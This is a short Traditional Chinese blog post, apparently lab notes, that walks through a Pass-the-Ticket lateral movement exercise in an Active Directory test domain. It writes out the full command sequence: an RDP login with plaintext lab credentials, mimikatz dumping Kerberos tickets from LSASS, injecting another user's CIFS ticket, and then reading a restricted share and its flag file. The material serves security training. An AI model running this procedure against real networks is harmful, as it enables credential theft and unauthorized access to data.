Active Directory 中的橫向移動 - PtT
Active Directory 中的橫向移動 - PtT
Pass the Ticket
使用 CORP\jen / Nexus123! RDP 登入到 Client76
└─$ xfreerdp /u:jen /p:'Nexus123!' /d:corp.com /v:192.168.191.76
直接存取 web04 上的 backup 資料夾看看 ls \\web04\backup
直接顯示 Access is denied
啟動 mimikatz 然後開啟 debug mode : privilege::debug
接著輸入 sekurlsa::tickets /export 從記憶體中匯出所有 TGT/TGS
可以看到 dave 的 Session Key
退出 mimikatz 執行 dir *.kirbi
這是因為 sekurlsa::tickets /export 顯示出來的結果是解析記憶體中的 LSASS 進程空間以查找任何 TGT/TGS,然後以 kirbi mimikatz 格式儲存到磁碟,所以我們直接列出所有的 *.kirbi 如下
因為我們的目標是 web04 所以將相關的 *.kirbi 專注在有 web04 的地方
可以看到是 dave @ web04,其中一筆是 [0;163e20]-0-0-40810000-dave@cifs-web04.kirbi
透過 mimikatz 的 ptt 方式執行
kerberos::ptt [0;163e20]-0-0-40810000-dave@cifs-web04.kirbi
再 klist 看一下,可以看到網域中 dave 的憑證了
針對的伺服器是 cifs/web04@corp.com
再執行 ls \\web04\backup 這一次沒有 Access is denied 了,直接列出相關的資源供查看
練習 : 與上面一樣,最後拿那個分享資料夾的 flag.txt
直接將 ls 改 type 即可讀取
留言
張貼留言